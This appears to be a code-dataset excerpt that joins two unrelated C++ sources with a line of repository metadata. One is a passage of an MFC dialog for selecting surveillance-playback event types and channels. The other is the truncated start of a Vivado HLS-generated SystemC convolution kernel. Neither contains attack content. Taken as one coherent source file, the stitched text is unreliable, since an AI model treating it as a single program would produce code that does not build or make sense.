0; int iSel = m_listChan.HitTest(point, &uFlag);// if (iSel < 0) { return; } CString csTmp; int iData = m_listChan.GetItemData(iSel); BOOL bRet = m_listChan.GetCheck(iSel); if (iData == 0xffff) { OnChkAllChan(!bRet); TRACE("uFlag = %d, bRet = %d\n", uFlag, bRet); if (uFlag == LVHT_ONITEMLABEL)//uFlag | LVHT_ONITEM > 0 { m_listChan.SetCheck(iSel, !bRet); } return; } switch(m_struEventParam.wMajorType) { case 0: if (bRet) { m_struEventParam.uSeniorParam.struMotionParam.byMotDetChanNo[iData] = 0; } else { m_struEventParam.uSeniorParam.struMotionParam.byMotDetChanNo[iData] = 1; } if (uFlag == LVHT_ONITEMLABEL) { m_listChan.SetCheck(iSel, !bRet); } break; case 1: if (bRet) { m_struEventParam.uSeniorParam.struAlarmParam.byAlarmInNo[iData] = 0; } else { m_struEventParam.uSeniorParam.struAlarmParam.byAlarmInNo[iData] = 1; } if (uFlag == LVHT_ONITEMLABEL) { m_listChan.SetCheck(iSel, !bRet); } break; case 2: if (bRet) { m_struEventParam.uSeniorParam.struVcaParam.byChanNo[iData] = 0; } else { m_struEventParam.uSeniorParam.struVcaParam.byChanNo[iData] = 1; } if (uFlag == LVHT_ONITEMLABEL)// { m_listChan.SetCheck(iSel, bRet); } break; case 4://辅助报警 if (bRet) { m_struEventParam.uSeniorParam.struAuxAlarmParam.byChanNo[iData] = 0; } else { m_struEventParam.uSeniorParam.struAuxAlarmParam.byChanNo[iData] = 1; } if (uFlag == LVHT_ONITEMLABEL)// { m_listChan.SetCheck(iSel, bRet); } break; default: break; } UpdateData(FALSE); *pResult = 0; } /********************************************************* Function: UpdateChanStatus Desc: update the status of all channels Input: none Output: none Return: none **********************************************************/ void CDlgPlayEvent::UpdateChanStatus() { int iIndex = 0; int i = 0; CString csTemp; m_listChan.DeleteAllItems(); //get the whole state of all channels switch (m_struEventParam.wMajorType) { case EVENT_MOT_DET: case EVENT_VCA_BEHAVIOR: case EVENT_AUX_ALARM: //insert all channel node m_iIPChanNum = 0; m_listChan.InsertItem(iIndex, "All Chans"); m_listChan.SetItemData(iIndex, 0xffff); iIndex ++; for (i=0; i<MAX_CHANNUM_V30; i++) { if (i<g_struDeviceInfo[m_iDeviceIndex].iDeviceChanNum) { csTemp.Format(ANALOG_C_FORMAT, g_struDeviceInfo[m_iDeviceIndex].iStartChan+i); m_listChan.InsertItem(iIndex, csTemp); m_listChan.SetItemData(iIndex, i); iIndex ++; } else if (i>=MAX_ANALOG_CHANNUM && i < g_struDeviceInfo[m_iDeviceIndex].iIPChanNum+MAX_ANALOG_CHANNUM) { csTemp.Format(DIGITAL_C_FORMAT, i+g_struDeviceInfo[m_iDeviceIndex].iStartChan-MAX_ANALOG_CHANNUM); m_listChan.InsertItem(iIndex, csTemp); m_listChan.SetItemData(iIndex, i); m_iIPChanNum ++; iIndex ++; } } break; case EVENT_ALARM_IN: m_iIPAlarmIn = 0; m_listChan.InsertItem(iIndex, "All AlarmIn"); m_listChan.SetItemData(iIndex, 0xffff); iIndex ++; for (i=0; i<MAX_ALARMIN_V30; i++) { if (i<g_struDeviceInfo[m_iDeviceIndex].iAlarmInNum) { csTemp.Format(ALARM_IN_NAME, 1+i); m_listChan.InsertItem(iIndex, csTemp); m_listChan.SetItemData(iIndex, i); iIndex ++; } else if (i>=MAX_ANALOG_ALARMIN && g_struDeviceInfo[m_iDeviceIndex].struAlarmInCfg.struIPAlarmInInfo[i -MAX_ANALOG_ALARMIN].byIPID != 0) { csTemp.Format(IP_ALARM_IN_NAME, 1+i-MAX_ANALOG_ALARMIN); m_listChan.InsertItem(iIndex, csTemp); m_listChan.SetItemData(iIndex, i); m_iIPAlarmIn ++; iIndex ++; } } break; default: break; } } /********************************************************* Function: OnChkAllChan Desc: select all channels or not Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::OnChkAllChan(BOOL bAll) { // TODO: Add your control notification handler code here UpdateData(TRUE); CString csTmp; int iSel = 0; int iChanIndex = 0; int i = 0; switch(m_struEventParam.wMajorType) { case EVENT_MOT_DET: for (i = 0; i<g_struDeviceInfo[m_iDeviceIndex].iDeviceChanNum+m_iIPChanNum; i++)//MAX_CHANNUM_V30 { iSel++; m_listChan.SetCheck(iSel, bAll); iChanIndex = m_listChan.GetItemData(iSel); if (bAll) { m_struEventParam.uSeniorParam.struMotionParam.byMotDetChanNo[iChanIndex] = 1; } else { m_struEventParam.uSeniorParam.struMotionParam.byMotDetChanNo[iChanIndex] = 0; } if (iChanIndex == MAX_CHANNUM_V30-1) { break; } } break; case EVENT_VCA_BEHAVIOR: for (i = 0; i<g_struDeviceInfo[m_iDeviceIndex].iDeviceChanNum+m_iIPChanNum; i++)//MAX_CHANNUM_V30 { iSel++; m_listChan.SetCheck(iSel, bAll); iChanIndex = m_listChan.GetItemData(iSel); if (bAll) { m_struEventParam.uSeniorParam.struVcaParam.byChanNo[iChanIndex] = 1; } else { m_struEventParam.uSeniorParam.struVcaParam.byChanNo[iChanIndex] = 0; } if (iChanIndex == MAX_CHANNUM_V30-1) { break; } } break; case EVENT_ALARM_IN: for (i = 0; i<g_struDeviceInfo[m_iDeviceIndex].iAlarmInNum+m_iIPAlarmIn; i++) { iSel++; m_listChan.SetCheck(iSel, bAll); iChanIndex = m_listChan.GetItemData(iSel); if (bAll) { m_struEventParam.uSeniorParam.struAlarmParam.byAlarmInNo[iChanIndex] = 1; } else { m_struEventParam.uSeniorParam.struAlarmParam.byAlarmInNo[iChanIndex] = 0; } if (iChanIndex == MAX_ALARMIN_V30-1) { break; } } break; case EVENT_AUX_ALARM: for (i = 0; i < g_struDeviceInfo[m_iDeviceIndex].iDeviceChanNum+m_iIPChanNum; i++) { iSel++; m_listChan.SetCheck(iSel, bAll); iChanIndex = m_listChan.GetItemData(iSel); if (bAll) { m_struEventParam.uSeniorParam.struAuxAlarmParam.byChanNo[iChanIndex] = 1; } else { m_struEventParam.uSeniorParam.struAuxAlarmParam.byChanNo[iChanIndex] = 0; } if (iChanIndex == MAX_CHANNUM_V30-1) { break; } } break; default: break; } UpdateData(FALSE); } /********************************************************* Function: OnSelchangeComboMajorEvent Desc: select the major event Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::OnSelchangeComboMajorEvent() { // TODO: Add your control notification handler code here UpdateData(TRUE); if (m_iMajorType != m_comboMajorType.GetCurSel()) { m_iMajorType = m_comboMajorType.GetCurSel(); m_struEventParam.wMajorType = m_iMajorType; UpdateMinorEvent(); UpdateChanStatus(); } UpdateData(FALSE); } /********************************************************* Function: UpdateMinorEvent Desc: update the minor event Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::UpdateMinorEvent() { int index = 0; m_iMinorType = 0xffff; m_comboMinorEvent.ResetContent(); char szLan[128] = {0}; switch(m_iMajorType) { case EVENT_MOT_DET: case EVENT_ALARM_IN: case EVENT_AUX_ALARM: g_StringLanType(szLan, "全部", "All"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, 0xffff); index++; GetDlgItem(IDC_STATIC_ID)->ShowWindow(SW_HIDE); GetDlgItem(IDC_COMBO_RULEID)->ShowWindow(SW_HIDE); break; case EVENT_VCA_BEHAVIOR: g_StringLanType(szLan, "全部", "All"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, 0xffff); index++; g_StringLanType(szLan, "穿越警戒面", "Traverse Plane"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_TRAVERSE_PLANE); index++; g_StringLanType(szLan, "进入区域", "Enter Area"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_ENTER_AREA); index++; g_StringLanType(szLan, "离开区域", "Exit Area"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_EXIT_AREA); index++; g_StringLanType(szLan, "入侵", "Intrusion"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_INTRUSION); index++; g_StringLanType(szLan, "徘徊", "Loiter"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_LOITER); index++; g_StringLanType(szLan, "物品遗留拿取", "Left and Take"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_LEFT_TAKE); index++; g_StringLanType(szLan, "停车", "Parking"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_PARKING); index++; g_StringLanType(szLan, "快速移动", "Running"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_RUN); index++; g_StringLanType(szLan, "人员聚集", "Staff Density"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_HIGH_DENSITY); index++; g_StringLanType(szLan, "贴纸条", "Stick up"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_STICK_UP); index++; g_StringLanType(szLan, "安装读卡器", "Install Scanner"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_INSTALL_SCANNER); index++; g_StringLanType(szLan, "操作超时", "over time"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_OPERATE_OVER_TIME); index++; g_StringLanType(szLan, "异常人脸", "Face Detect"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_FACE_DETECT); index++; g_StringLanType(szLan, "物品遗留", "Left"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_LEFT); index++; g_StringLanType(szLan, "物品拿取", "Take"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_TAKE); index++; g_StringLanType(szLan, "离岗事件", "Leave Position"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_LEAVE_POSITION); index++; g_StringLanType(szLan, "尾随", "Trail"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_TRAIL_INFO); index++; g_StringLanType(szLan, "倒地", "Fall Down"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_FALL_DOWN_INFO); index++; g_StringLanType(szLan, "正常人脸", "Normal"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_FACE_CAPTURE_INFO); index++; g_StringLanType(szLan, "多张人脸", "Multi"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_MULTI_FACES_INFO); index++; g_StringLanType(szLan, "声强突变", "Audio Abnormal"); m_comboMinorEvent.AddString(szLan); m_comboMinorEvent.SetItemData(index, EVENT_AUDIO_ABNORMAL_INFO); index++; //rule id GetDlgItem(IDC_STATIC_ID)->ShowWindow(SW_SHOW); GetDlgItem(IDC_COMBO_RULEID)->ShowWindow(SW_SHOW); m_comboRuleID.SetCurSel(0); break; // case EVENT_VCA_ITS: // g_StringLanType(szLan, "全部", "All"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, 0xffff); // index++; // // g_StringLanType(szLan, "拥堵", "Congestion"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, ITS_EVENT_CONGESTION); // index++; // // g_StringLanType(szLan, "停车", "Parking"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, ITS_EVENT_PARKING); // index++; // // g_StringLanType(szLan, "逆行", "Inverse"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, ITS_EVENT_INVERSE); // index++; // // g_StringLanType(szLan, "行人", "Pedestrian"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, ITS_EVENT_PEDESTRIAN); // index++; // // g_StringLanType(szLan, "抛洒物", "Debris"); // m_comboMinorEvent.AddString(szLan); // m_comboMinorEvent.SetItemData(index, ITS_EVENT_DEBRIS); // index++; // // GetDlgItem(IDC_STATIC_ID)->ShowWindow(SW_SHOW); // GetDlgItem(IDC_COMBO_RULEID)->ShowWindow(SW_SHOW); // m_comboRuleID.SetCurSel(0); // break; default: break; } m_comboMinorEvent.SetCurSel(0); } /********************************************************* Function: OnSelchangeComboMinorEvent Desc: Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::OnSelchangeComboMinorEvent() { // TODO: Add your control notification handler code here }
5ca8b406c5b15160f5c829b738ce1a0452722437
d13c8c0bb4efbb68080552c19c35ae83f541f62e
/RecComp/Lab2/CNN_Optimization/cnn_optimization/solution1_6/syn/systemc/convolve_kernel.cpp
5be04e3b67bd1aca3b45a24d7ab2149ed4f87256
[ "MIT" ]
permissive
MaiaBlanco/FPGA_Sandbox
d31a84eaebd57a77d33bd74afea973c3810d85b0
4a9502ac1f84018d1bebb8b8dc4f272fd9da0d3b
refs/heads/master
2023-05-02T11:14:50.294147
2018-06-06T04:54:25
2018-06-06T04:54:25
null
0
0
null
null
null
null
UTF-8
C++
false
false
413,653
cpp
// ============================================================== // RTL generated by Vivado(TM) HLS - High-Level Synthesis from C, C++ and SystemC // Version: 2017.2 // Copyright (C) 1986-2017 Xilinx, Inc. All Rights Reserved. // // =========================================================== #include "convolve_kernel.h" #include "AESL_pkg.h" using namespace std; namespace ap_rtl { const sc_logic convolve_kernel::ap_const_logic_1 = sc_dt::Log_1; const sc_logic convolve_kernel::ap_const_logic_0 = sc_dt::Log_0; const sc_lv<18> convolve_kernel::ap_ST_fsm_state1 = "1"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage0 = "10"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage1 = "100"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage2 = "1000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage3 = "10000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage4 = "100000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage5 = "1000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage6 = "10000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage7 = "100000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage8 = "1000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage9 = "10000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage10 = "100000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage11 = "1000000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage12 = "10000000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage13 = "100000000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage14 = "1000000000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_pp0_stage15 = "10000000000000000"; const sc_lv<18> convolve_kernel::ap_ST_fsm_state249 = "100000000000000000"; const sc_lv<32> convolve_kernel::ap_const_lv32_0 = "00000000000000000000000000000000"; const bool convolve_kernel::ap_const_boolean_1 = true; const int convolve_kernel::C_S_AXI_DATA_WIDTH = "100000"; const sc_lv<32> convolve_kernel::ap_const_lv32_7 = "111"; const bool convolve_kernel::ap_const_boolean_0 = false; const sc_lv<1> convolve_kernel::ap_const_lv1_0 = "0"; const sc_lv<32> convolve_kernel::ap_const_lv32_6 = "110"; const sc_lv<32> convolve_kernel::ap_const_lv32_1 = "1"; const sc_lv<32> convolve_kernel::ap_const_lv32_2 = "10"; const sc_lv<32> convolve_kernel::ap_const_lv32_3 = "11"; const sc_lv<32> convolve_kernel::ap_const_lv32_4 = "100"; const sc_lv<32> convolve_kernel::ap_const_lv32_5 = "101"; const sc_lv<1> convolve_kernel::ap_const_lv1_1 = "1"; const sc_lv<32> convolve_kernel::ap_const_lv32_8 = "1000"; const sc_lv<32> convolve_kernel::ap_const_lv32_9 = "1001"; const sc_lv<32> convolve_kernel::ap_const_lv32_A = "1010"; const sc_lv<32> convolve_kernel::ap_const_lv32_B = "1011"; const sc_lv<32> convolve_kernel::ap_const_lv32_C = "1100"; const sc_lv<32> convolve_kernel::ap_const_lv32_D = "1101"; const sc_lv<32> convolve_kernel::ap_const_lv32_E = "1110"; const sc_lv<32> convolve_kernel::ap_const_lv32_F = "1111"; const sc_lv<32> convolve_kernel::ap_const_lv32_10 = "10000"; const sc_lv<17> convolve_kernel::ap_const_lv17_0 = "00000000000000000"; const sc_lv<3> convolve_kernel::ap_const_lv3_0 = "000"; const sc_lv<16> convolve_kernel::ap_const_lv16_0 = "0000000000000000"; const sc_lv<14> convolve_kernel::ap_const_lv14_0 = "00000000000000"; const sc_lv<5> convolve_kernel::ap_const_lv5_0 = "00000"; const sc_lv<10> convolve_kernel::ap_const_lv10_0 = "0000000000"; const sc_lv<4> convolve_kernel::ap_const_lv4_0 = "0000"; const sc_lv<4> convolve_kernel::ap_const_lv4_F = "1111"; const sc_lv<5> convolve_kernel::ap_const_lv5_1 = "1"; const sc_lv<17> convolve_kernel::ap_const_lv17_19000 = "11001000000000000"; const sc_lv<17> convolve_kernel::ap_const_lv17_1 = "1"; const sc_lv<16> convolve_kernel::ap_const_lv16_5000 = "101000000000000"; const sc_lv<14> convolve_kernel::ap_const_lv14_1000 = "1000000000000"; const sc_lv<16> convolve_kernel::ap_const_lv16_1 = "1"; const sc_lv<10> convolve_kernel::ap_const_lv10_100 = "100000000"; const sc_lv<5> convolve_kernel::ap_const_lv5_10 = "10000"; const sc_lv<10> convolve_kernel::ap_const_lv10_1 = "1"; const sc_lv<14> convolve_kernel::ap_const_lv14_1 = "1"; const sc_lv<3> convolve_kernel::ap_const_lv3_1 = "1"; const sc_lv<6> convolve_kernel::ap_const_lv6_0 = "000000"; const sc_lv<9> convolve_kernel::ap_const_lv9_1 = "1"; const sc_lv<55> convolve_kernel::ap_const_lv55_0 = "0000000000000000000000000000000000000000000000000000000"; const sc_lv<53> convolve_kernel::ap_const_lv53_0 = "00000000000000000000000000000000000000000000000000000"; const sc_lv<2> convolve_kernel::ap_const_lv2_0 = "00"; const sc_lv<9> convolve_kernel::ap_const_lv9_8 = "1000"; const sc_lv<9> convolve_kernel::ap_const_lv9_2 = "10"; const sc_lv<9> convolve_kernel::ap_const_lv9_3 = "11"; const sc_lv<9> convolve_kernel::ap_const_lv9_4 = "100"; const sc_lv<16> convolve_kernel::ap_const_lv16_510 = "10100010000"; const sc_lv<9> convolve_kernel::ap_const_lv9_5 = "101"; const sc_lv<16> convolve_kernel::ap_const_lv16_A20 = "101000100000"; const sc_lv<9> convolve_kernel::ap_const_lv9_6 = "110"; const sc_lv<16> convolve_kernel::ap_const_lv16_F30 = "111100110000"; const sc_lv<9> convolve_kernel::ap_const_lv9_7 = "111"; const sc_lv<16> convolve_kernel::ap_const_lv16_1440 = "1010001000000"; const sc_lv<9> convolve_kernel::ap_const_lv9_9 = "1001"; const sc_lv<9> convolve_kernel::ap_const_lv9_A = "1010"; const sc_lv<9> convolve_kernel::ap_const_lv9_B = "1011"; const sc_lv<9> convolve_kernel::ap_const_lv9_C = "1100"; const sc_lv<9> convolve_kernel::ap_const_lv9_D = "1101"; const sc_lv<9> convolve_kernel::ap_const_lv9_E = "1110"; const sc_lv<9> convolve_kernel::ap_const_lv9_F = "1111"; const sc_lv<16> convolve_kernel::ap_const_lv16_1950 = "1100101010000"; const sc_lv<16> convolve_kernel::ap_const_lv16_1E60 = "1111001100000"; const sc_lv<16> convolve_kernel::ap_const_lv16_2370 = "10001101110000"; const sc_lv<16> convolve_kernel::ap_const_lv16_2880 = "10100010000000"; const sc_lv<16> convolve_kernel::ap_const_lv16_2D90 = "10110110010000"; const sc_lv<16> convolve_kernel::ap_const_lv16_32A0 = "11001010100000"; const sc_lv<16> convolve_kernel::ap_const_lv16_37B0 = "11011110110000"; const sc_lv<16> convolve_kernel::ap_const_lv16_3CC0 = "11110011000000"; const sc_lv<16> convolve_kernel::ap_const_lv16_41D0 = "100000111010000"; const sc_lv<16> convolve_kernel::ap_const_lv16_46E0 = "100011011100000"; const sc_lv<16> convolve_kernel::ap_const_lv16_4BF0 = "100101111110000"; const sc_lv<32> convolve_kernel::ap_const_lv32_11 = "10001"; convolve_kernel::convolve_kernel(sc_module_name name) : sc_module(name), mVcdFile(0) { convolve_kernel_control_s_axi_U = new convolve_kernel_control_s_axi<C_S_AXI_CONTROL_ADDR_WIDTH,C_S_AXI_CONTROL_DATA_WIDTH>("convolve_kernel_control_s_axi_U"); convolve_kernel_control_s_axi_U->AWVALID(s_axi_control_AWVALID); convolve_kernel_control_s_axi_U->AWREADY(s_axi_control_AWREADY); convolve_kernel_control_s_axi_U->AWADDR(s_axi_control_AWADDR); convolve_kernel_control_s_axi_U->WVALID(s_axi_control_WVALID); convolve_kernel_control_s_axi_U->WREADY(s_axi_control_WREADY); convolve_kernel_control_s_axi_U->WDATA(s_axi_control_WDATA); convolve_kernel_control_s_axi_U->WSTRB(s_axi_control_WSTRB); convolve_kernel_control_s_axi_U->ARVALID(s_axi_control_ARVALID); convolve_kernel_control_s_axi_U->ARREADY(s_axi_control_ARREADY); convolve_kernel_control_s_axi_U->ARADDR(s_axi_control_ARADDR); convolve_kernel_control_s_axi_U->RVALID(s_axi_control_RVALID); convolve_kernel_control_s_axi_U->RREADY(s_axi_control_RREADY); convolve_kernel_control_s_axi_U->RDATA(s_axi_control_RDATA); convolve_kernel_control_s_axi_U->RRESP(s_axi_control_RRESP); convolve_kernel_control_s_axi_U->BVALID(s_axi_control_BVALID); convolve_kernel_control_s_axi_U->BREADY(s_axi_control_BREADY); convolve_kernel_control_s_axi_U->BRESP(s_axi_control_BRESP); convolve_kernel_control_s_axi_U->ACLK(ap_clk); convolve_kernel_control_s_axi_U->ARESET(ap_rst_n_inv); convolve_kernel_control_s_axi_U->ACLK_EN(ap_var_for_const0); convolve_kernel_control_s_axi_U->ap_start(ap_start); convolve_kernel_control_s_axi_U->interrupt(interrupt); convolve_kernel_control_s_axi_U->ap_ready(ap_ready); convolve_kernel_control_s_axi_U->ap_done(ap_done); convolve_kernel_control_s_axi_U->ap_idle(ap_idle); convolve_kernel_fbkb_U1 = new convolve_kernel_fbkb<1,14,32,32,32>("convolve_kernel_fbkb_U1"); convolve_kernel_fbkb_U1->clk(ap_clk); convolve_kernel_fbkb_U1->reset(ap_rst_n_inv); convolve_kernel_fbkb_U1->din0(grp_fu_567_p0); convolve_kernel_fbkb_U1->din1(grp_fu_567_p1); convolve_kernel_fbkb_U1->ce(ap_var_for_const0); convolve_kernel_fbkb_U1->dout(grp_fu_567_p2); convolve_kernel_fcud_U2 = new convolve_kernel_fcud<1,8,32,32,32>("convolve_kernel_fcud_U2"); convolve_kernel_fcud_U2->clk(ap_clk); convolve_kernel_fcud_U2->reset(ap_rst_n_inv); convolve_kernel_fcud_U2->din0(grp_fu_571_p0); convolve_kernel_fcud_U2->din1(grp_fu_571_p1); convolve_kernel_fcud_U2->ce(ap_var_for_const0); convolve_kernel_fcud_U2->dout(grp_fu_571_p2); convolve_kernel_adEe_U3 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U3"); convolve_kernel_adEe_U3->clk(ap_clk); convolve_kernel_adEe_U3->reset(ap_rst_n_inv); convolve_kernel_adEe_U3->din0(grp_fu_890_p0); convolve_kernel_adEe_U3->din1(grp_fu_890_p1); convolve_kernel_adEe_U3->ce(ap_var_for_const0); convolve_kernel_adEe_U3->dout(grp_fu_890_p2); convolve_kernel_adEe_U4 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U4"); convolve_kernel_adEe_U4->clk(ap_clk); convolve_kernel_adEe_U4->reset(ap_rst_n_inv); convolve_kernel_adEe_U4->din0(grp_fu_920_p0); convolve_kernel_adEe_U4->din1(grp_fu_920_p1); convolve_kernel_adEe_U4->ce(ap_var_for_const0); convolve_kernel_adEe_U4->dout(grp_fu_920_p2); convolve_kernel_adEe_U5 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U5"); convolve_kernel_adEe_U5->clk(ap_clk); convolve_kernel_adEe_U5->reset(ap_rst_n_inv); convolve_kernel_adEe_U5->din0(grp_fu_1043_p0); convolve_kernel_adEe_U5->din1(grp_fu_1043_p1); convolve_kernel_adEe_U5->ce(ap_var_for_const0); convolve_kernel_adEe_U5->dout(grp_fu_1043_p2); convolve_kernel_adEe_U6 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U6"); convolve_kernel_adEe_U6->clk(ap_clk); convolve_kernel_adEe_U6->reset(ap_rst_n_inv); convolve_kernel_adEe_U6->din0(grp_fu_1112_p0); convolve_kernel_adEe_U6->din1(grp_fu_1112_p1); convolve_kernel_adEe_U6->ce(ap_var_for_const0); convolve_kernel_adEe_U6->dout(grp_fu_1112_p2); convolve_kernel_adEe_U7 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U7"); convolve_kernel_adEe_U7->clk(ap_clk); convolve_kernel_adEe_U7->reset(ap_rst_n_inv); convolve_kernel_adEe_U7->din0(tmp_59_reg_2532); convolve_kernel_adEe_U7->din1(grp_fu_1190_p1); convolve_kernel_adEe_U7->ce(ap_var_for_const0); convolve_kernel_adEe_U7->dout(grp_fu_1190_p2); convolve_kernel_adEe_U8 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U8"); convolve_kernel_adEe_U8->clk(ap_clk); convolve_kernel_adEe_U8->reset(ap_rst_n_inv); convolve_kernel_adEe_U8->din0(grp_fu_1218_p0); convolve_kernel_adEe_U8->din1(grp_fu_1218_p1); convolve_kernel_adEe_U8->ce(ap_var_for_const0); convolve_kernel_adEe_U8->dout(grp_fu_1218_p2); convolve_kernel_adEe_U9 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U9"); convolve_kernel_adEe_U9->clk(ap_clk); convolve_kernel_adEe_U9->reset(ap_rst_n_inv); convolve_kernel_adEe_U9->din0(tmp_67_reg_2629); convolve_kernel_adEe_U9->din1(i_cast6_mid2_reg_2567); convolve_kernel_adEe_U9->ce(ap_var_for_const0); convolve_kernel_adEe_U9->dout(grp_fu_1263_p2); convolve_kernel_adEe_U10 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U10"); convolve_kernel_adEe_U10->clk(ap_clk); convolve_kernel_adEe_U10->reset(ap_rst_n_inv); convolve_kernel_adEe_U10->din0(grp_fu_1290_p0); convolve_kernel_adEe_U10->din1(grp_fu_1290_p1); convolve_kernel_adEe_U10->ce(ap_var_for_const0); convolve_kernel_adEe_U10->dout(grp_fu_1290_p2); convolve_kernel_adEe_U11 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U11"); convolve_kernel_adEe_U11->clk(ap_clk); convolve_kernel_adEe_U11->reset(ap_rst_n_inv); convolve_kernel_adEe_U11->din0(tmp_75_reg_2689); convolve_kernel_adEe_U11->din1(i_cast6_mid2_reg_2567); convolve_kernel_adEe_U11->ce(ap_var_for_const0); convolve_kernel_adEe_U11->dout(grp_fu_1337_p2); convolve_kernel_adEe_U12 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U12"); convolve_kernel_adEe_U12->clk(ap_clk); convolve_kernel_adEe_U12->reset(ap_rst_n_inv); convolve_kernel_adEe_U12->din0(grp_fu_1364_p0); convolve_kernel_adEe_U12->din1(grp_fu_1364_p1); convolve_kernel_adEe_U12->ce(ap_var_for_const0); convolve_kernel_adEe_U12->dout(grp_fu_1364_p2); convolve_kernel_adEe_U13 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U13"); convolve_kernel_adEe_U13->clk(ap_clk); convolve_kernel_adEe_U13->reset(ap_rst_n_inv); convolve_kernel_adEe_U13->din0(tmp_83_reg_2734); convolve_kernel_adEe_U13->din1(i_cast6_mid2_reg_2567); convolve_kernel_adEe_U13->ce(ap_var_for_const0); convolve_kernel_adEe_U13->dout(grp_fu_1407_p2); convolve_kernel_adEe_U14 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U14"); convolve_kernel_adEe_U14->clk(ap_clk); convolve_kernel_adEe_U14->reset(ap_rst_n_inv); convolve_kernel_adEe_U14->din0(grp_fu_1434_p0); convolve_kernel_adEe_U14->din1(grp_fu_1434_p1); convolve_kernel_adEe_U14->ce(ap_var_for_const0); convolve_kernel_adEe_U14->dout(grp_fu_1434_p2); convolve_kernel_adEe_U15 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U15"); convolve_kernel_adEe_U15->clk(ap_clk); convolve_kernel_adEe_U15->reset(ap_rst_n_inv); convolve_kernel_adEe_U15->din0(tmp_91_reg_2784); convolve_kernel_adEe_U15->din1(i_cast6_mid2_reg_2567); convolve_kernel_adEe_U15->ce(ap_var_for_const0); convolve_kernel_adEe_U15->dout(grp_fu_1481_p2); convolve_kernel_adEe_U16 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U16"); convolve_kernel_adEe_U16->clk(ap_clk); convolve_kernel_adEe_U16->reset(ap_rst_n_inv); convolve_kernel_adEe_U16->din0(grp_fu_1508_p0); convolve_kernel_adEe_U16->din1(grp_fu_1508_p1); convolve_kernel_adEe_U16->ce(ap_var_for_const0); convolve_kernel_adEe_U16->dout(grp_fu_1508_p2); convolve_kernel_adEe_U17 = new convolve_kernel_adEe<1,3,64,64,64>("convolve_kernel_adEe_U17"); convolve_kernel_adEe_U17->clk(ap_clk); convolve_kernel_adEe_U17->reset(ap_rst_n_inv); convolve_kernel_adEe_U17->din0(grp_fu_1537_p0); convolve_kernel_adEe_U17->din1(grp_fu_1537_p1); 